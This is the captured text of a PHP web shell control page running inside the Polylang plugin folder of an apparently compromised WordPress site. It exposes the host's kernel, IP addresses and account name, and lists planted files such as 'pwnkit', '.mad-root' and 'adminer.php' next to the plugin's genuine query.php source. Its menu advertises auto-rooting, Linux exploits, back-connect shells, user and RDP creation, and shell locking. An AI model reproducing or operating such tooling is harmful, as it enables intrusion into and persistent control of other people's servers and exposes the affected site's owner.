Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
polylang /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Capabilities
[ DIR ]
drwxr-xr-x
Model
[ DIR ]
drwxr-xr-x
Options
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
frontend
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
integrations
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
api.php
21.77
KB
-rw-r--r--
base.php
6.11
KB
-rw-r--r--
cache.php
2.4
KB
-rw-r--r--
class-polylang.php
8.34
KB
-rw-r--r--
constant-functions.php
1.81
KB
-rw-r--r--
cookie.php
3.03
KB
-rw-r--r--
crud-posts.php
12.82
KB
-rw-r--r--
crud-terms.php
8.75
KB
-rw-r--r--
default-term.php
6.44
KB
-rw-r--r--
filter-rest-routes.php
4.98
KB
-rw-r--r--
filters-links.php
5.64
KB
-rw-r--r--
filters-sanitization.php
3.23
KB
-rw-r--r--
filters-widgets-options.php
2.63
KB
-rw-r--r--
filters.php
12.94
KB
-rw-r--r--
format-util.php
3.04
KB
-rw-r--r--
functions.php
5.14
KB
-rw-r--r--
language-deprecated.php
7.13
KB
-rw-r--r--
language-factory.php
9.4
KB
-rw-r--r--
language.php
18.07
KB
-rw-r--r--
license.php
9.39
KB
-rw-r--r--
links-abstract-domain.php
3.16
KB
-rw-r--r--
links-default.php
3.03
KB
-rw-r--r--
links-directory.php
9.5
KB
-rw-r--r--
links-domain.php
2.91
KB
-rw-r--r--
links-model.php
6.52
KB
-rw-r--r--
links-permalinks.php
5.62
KB
-rw-r--r--
links-subdomain.php
2.16
KB
-rw-r--r--
links.php
1.38
KB
-rw-r--r--
mo.php
3.42
KB
-rw-r--r--
model.php
22.96
KB
-rw-r--r--
nav-menu.php
4.5
KB
-rw-r--r--
olt-manager.php
2.98
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
query.php
7.73
KB
-rw-r--r--
rest-request.php
4.22
KB
-rw-r--r--
static-pages.php
6.27
KB
-rw-r--r--
switcher.php
10.97
KB
-rw-r--r--
term-slug.php
4.89
KB
-rw-r--r--
translatable-object-with-types...
1.03
KB
-rw-r--r--
translatable-object-with-types...
1.96
KB
-rw-r--r--
translatable-object.php
17.62
KB
-rw-r--r--
translatable-objects.php
3.71
KB
-rw-r--r--
translate-option.php
13.1
KB
-rw-r--r--
translated-object.php
18.93
KB
-rw-r--r--
translated-post.php
17.17
KB
-rw-r--r--
translated-term.php
14.82
KB
-rw-r--r--
walker-dropdown.php
3.77
KB
-rw-r--r--
walker-list.php
2.54
KB
-rw-r--r--
walker.php
2.38
KB
-rw-r--r--
widget-calendar.php
11.58
KB
-rw-r--r--
widget-languages.php
5.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : query.php
<?php /** * @package Polylang */ /** * A class to manipulate the language query var in WP_Query * * @since 2.2 */ class PLL_Query { /** * @var PLL_Model */ public $model; /** * @var WP_Query */ public $query; /** * Constructor * * @since 2.2 * * @param WP_Query $query Reference to the WP_Query object. * @param PLL_Model $model Instance of PLL_Model. */ public function __construct( &$query, &$model ) { $this->query = &$query; $this->model = &$model; } /** * Checks if the query already includes a language taxonomy. * * @since 3.0 * * @param array $qvars WP_Query query vars. * @return bool */ protected function is_already_filtered( $qvars ) { if ( isset( $qvars['lang'] ) ) { return true; } if ( ! empty( $qvars['tax_query'] ) && is_array( $qvars['tax_query'] ) ) { foreach ( $qvars['tax_query'] as $tax_query ) { if ( isset( $tax_query['taxonomy'] ) && 'language' === $tax_query['taxonomy'] ) { return true; } } } return false; } /** * Check if translated taxonomy is queried * Compatible with nested queries introduced in WP 4.1 * * @see https://wordpress.org/support/topic/tax_query-bug * * @since 1.7 * * @param array $tax_queries An array of tax queries. * @return bool */ protected function have_translated_taxonomy( $tax_queries ) { if ( is_array( $tax_queries ) ) { foreach ( $tax_queries as $tax_query ) { if ( isset( $tax_query['taxonomy'] ) && $this->model->is_translated_taxonomy( $tax_query['taxonomy'] ) && ! ( isset( $tax_query['operator'] ) && 'NOT IN' === $tax_query['operator'] ) ) { return true; } // Nested queries elseif ( is_array( $tax_query ) && $this->have_translated_taxonomy( $tax_query ) ) { return true; } } } return false; } /** * Get queried taxonomies * * @since 2.2 * * @return array queried taxonomies */ public function get_queried_taxonomies() { return ! empty( $this->query->tax_query->queried_terms ) ? array_keys( wp_list_filter( $this->query->tax_query->queried_terms, array( 'operator' => 'NOT IN' ), 'NOT' ) ) : array(); } /** * Sets the language in query. * Optimized for (and requires) WP 3.5+. * * @since 2.2 * @since 3.3 Accepts now an array of languages. * * @param PLL_Language|PLL_Language[] $languages Language object(s). * @return void */ public function set_language( $languages ) { if ( ! is_array( $languages ) ) { $languages = array( $languages ); } $tt_ids = array(); foreach ( $languages as $language ) { $tt_ids[] = $language->get_tax_prop( 'language', 'term_taxonomy_id' ); } // Defining directly the tax_query (rather than setting 'lang' avoids transforming the query by WP). $lang_query = array( 'taxonomy' => 'language', 'field' => 'term_taxonomy_id', // Since WP 3.5 'terms' => $tt_ids, 'operator' => 'IN', ); $tax_query = &$this->query->query_vars['tax_query']; if ( isset( $tax_query['relation'] ) && 'OR' === $tax_query['relation'] ) { $tax_query = array( $lang_query, $tax_query, 'relation' => 'AND', ); } elseif ( is_array( $tax_query ) ) { // The tax query is expected to be *always* an array, but it seems that 3rd parties fill it with a string // Causing a fatal error if we don't check it. // See https://wordpress.org/support/topic/fatal-error-2947/ $tax_query[] = $lang_query; } elseif ( empty( $tax_query ) ) { // Supposing the tax query has been wrongly filled with an empty string $tax_query = array( $lang_query ); } } /** * Adds the language in the query after it has checked that it won't conflict with other query vars. * * @since 2.2 * * @param PLL_Language|false $lang Language. * @return void */ public function filter_query( $lang ) { $qvars = &$this->query->query_vars; if ( ! $this->is_already_filtered( $qvars ) ) { $taxonomies = array_intersect( $this->model->get_translated_taxonomies(), get_taxonomies( array( '_builtin' => false ) ) ); foreach ( $taxonomies as $tax ) { $tax_object = get_taxonomy( $tax ); if ( ! empty( $tax_object ) && ! empty( $qvars[ $tax_object->query_var ] ) ) { return; } } if ( ! empty( $qvars['tax_query'] ) && $this->have_translated_taxonomy( $qvars['tax_query'] ) ) { return; } // Filter queries according to the requested language if ( ! empty( $lang ) ) { $taxonomies = $this->get_queried_taxonomies(); if ( $taxonomies && ( empty( $qvars['post_type'] ) || 'any' === $qvars['post_type'] ) ) { foreach ( $taxonomies as $taxonomy ) { $tax_object = get_taxonomy( $taxonomy ); if ( ! empty( $tax_object ) && $this->model->is_translated_post_type( $tax_object->object_type ) ) { $this->set_language( $lang ); break; } } } elseif ( empty( $qvars['post_type'] ) || $this->model->is_translated_post_type( $qvars['post_type'] ) ) { $this->set_language( $lang ); } } } else { $this->maybe_set_language_for_or_relation(); // Do not filter untranslatable post types such as nav_menu_item if ( isset( $qvars['post_type'] ) && ! $this->model->is_translated_post_type( $qvars['post_type'] ) && ( empty( $qvars['tax_query'] ) || ! $this->have_translated_taxonomy( $qvars['tax_query'] ) ) ) { unset( $qvars['lang'] ); } // Unset 'all' query var (mainly for admin language filter). if ( isset( $qvars['lang'] ) && 'all' === $qvars['lang'] ) { unset( $qvars['lang'] ); } } } /** * Sets the language correctly if the current query is a 'OR' relation, * since WordPress merges the language with the other query vars when the relation is OR. * * @since 3.3 * * @return void */ protected function maybe_set_language_for_or_relation() { if ( ! $this->query->tax_query instanceof WP_Tax_Query ) { return; } if ( 'OR' !== $this->query->tax_query->relation ) { return; } if ( ! isset( $this->query->tax_query->queried_terms['language'] ) ) { return; } $langs = $this->query->tax_query->queried_terms['language']['terms']; if ( is_string( $langs ) ) { $langs = explode( ',', $langs ); } $langs = array_map( array( $this->model, 'get_language' ), $langs ); $langs = array_filter( $langs ); if ( ! empty( $langs ) ) { $this->set_language( $langs ); unset( $this->query->query_vars['lang'] ); // Unset the language query var otherwise WordPress would add the language query by slug in WP_Query::parse_tax_query(). } } /** * Transforms a language query by `slug` to a language query by `term_taxonomy_id`. * * Example: * From: array( * 'taxonomy' => 'language', * 'terms' => array( 'en' ), * 'field' => 'slug', * 'operator' => 'IN', * 'include_children' => 1, * ) * To: array( * 'taxonomy' => 'language', * 'terms' => array( 238 ), * 'field' => 'term_taxonomy_id', * 'operator' => 'IN', * 'include_children' => 1, * ) * * @since 3.8 * * @return void */ public function transform_query(): void { if ( empty( $this->query->tax_query ) ) { // Null. return; } foreach ( $this->query->tax_query->queries as &$tax_query ) { if ( ! is_array( $tax_query ) || ! isset( $tax_query['taxonomy'], $tax_query['field'], $tax_query['terms'] ) ) { // Can be a `relation` entry (string), or a sub-query. continue; } if ( 'language' !== $tax_query['taxonomy'] || 'slug' !== $tax_query['field'] ) { // Not what we're looking for. continue; } $tax_query['field'] = 'term_taxonomy_id'; foreach ( $tax_query['terms'] as &$term ) { $language = $this->model->get_language( $term ); $term = ! empty( $language ) ? $language->get_tax_prop( 'language', 'term_taxonomy_id' ) : 0; } } } }
Close